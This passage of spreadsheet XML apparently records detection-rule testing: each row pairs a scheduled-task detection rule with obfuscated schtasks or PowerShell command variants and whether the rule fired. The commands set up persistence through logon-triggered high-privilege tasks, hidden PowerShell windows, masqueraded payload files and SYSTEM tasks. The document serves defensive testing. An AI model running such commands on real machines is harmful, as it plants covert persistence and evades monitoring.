          <t>schtasks.exe /"Create" -"TN" "BypassTask" -"TR" "powershell.exe -ENcOdEdCOmmANd aQBlAHgAZQB..." /sc ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I269" s="36" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J269" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="270" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B270" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C270" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D270" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E270" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I270" s="43" t="n"/>
      <c r="J270" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="271" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B271" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C271" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D271" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E271" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="272" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B272" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C272" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D272" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E272" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="43" t="n"/>
      <c r="B273" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C273" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D273" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E273" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /TN "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I273" s="36" t="n"/>
      <c r="J273" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="274" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="43" t="n"/>
      <c r="B274" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C274" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D274" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E274" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I274" s="36" t="n"/>
      <c r="J274" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="275" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="43" t="n"/>
      <c r="B275" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C275" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D275" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E275" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I275" s="36" t="n"/>
      <c r="J275" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B276" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C276" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D276" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E276" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I276" s="43" t="n"/>
      <c r="J276" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="277" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="43" t="n"/>
      <c r="B277" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C277" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D277" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E277" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F277" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G277" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I277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277" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K277" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="43" t="n"/>
      <c r="B278" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C278" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D278" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E278" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F278" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G278" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I278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278" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="43" t="n"/>
      <c r="B279" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C279" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D279" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E279" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /tn "MyScheduledTask.xml" /XML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I279" s="36" t="n"/>
      <c r="J279" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="280" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="n"/>
      <c r="B280" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C280" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D280" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E280" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTE /tn "MyScheduledTask.xml" /xML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F280" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G280" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I280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280" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B281" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C281" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D281" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E281" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I281" s="43" t="n"/>
      <c r="J281" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="n"/>
      <c r="B282" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C282" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D282" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E282" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATE /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J282" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B283" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C283" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D283" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E283" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I283" s="43" t="n"/>
      <c r="J283" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="n"/>
      <c r="B284" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C284" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D284" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E284" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I284" s="36" t="n"/>
      <c r="J284" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="285" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="n"/>
      <c r="B285" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C285" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D285" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E285" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tN "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J285" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="n"/>
      <c r="B286" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C286" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D286" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E286" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" -"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" -"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I286" s="36" t="n"/>
      <c r="J286" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="287" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B287" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C287" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D287" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E287" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I287" s="43" t="n"/>
      <c r="J287" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="288" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="n"/>
      <c r="B288" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C288" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D288" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E288" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J288" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K288" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B289" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C289" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D289" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E289" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I289" s="43" t="n"/>
      <c r="J289" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="290" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="n"/>
      <c r="B290" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C290" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D290" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E290" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /"tn" "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /F /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I290" s="43" t="n"/>
      <c r="J290" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="291" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B291" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C291" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D291" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E291" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I291" s="43" t="n"/>
      <c r="J291" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="292" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B292" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C292" s="36" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D292" s="36" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E292" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H292" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I292" s="43" t="n"/>
      <c r="J292" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K292" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="293" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="n"/>
      <c r="B293" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C293" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D293" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E293" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTE /sC ONCE -"ST" 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G293" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I293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93" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K293" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C294" s="36" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D294" s="36" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E294" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /tn "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /"F"</t>
        </is>
      </c>
      <c r="F294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G294" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I294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294" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K294" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C295" s="36" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D295" s="36" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E295" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H295" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I295" s="36" t="n"/>
